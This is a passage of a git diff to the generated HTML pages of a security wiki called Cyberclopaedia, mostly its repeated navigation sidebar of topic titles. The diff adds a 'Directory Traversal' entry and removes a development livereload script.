    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -327,22 +327,6 @@

Datag - - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html index 775b8efe..bf3bce0a 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -203,22 +203,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html index d3b8816b..aac5ace7 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -191,22 +191,6 @@

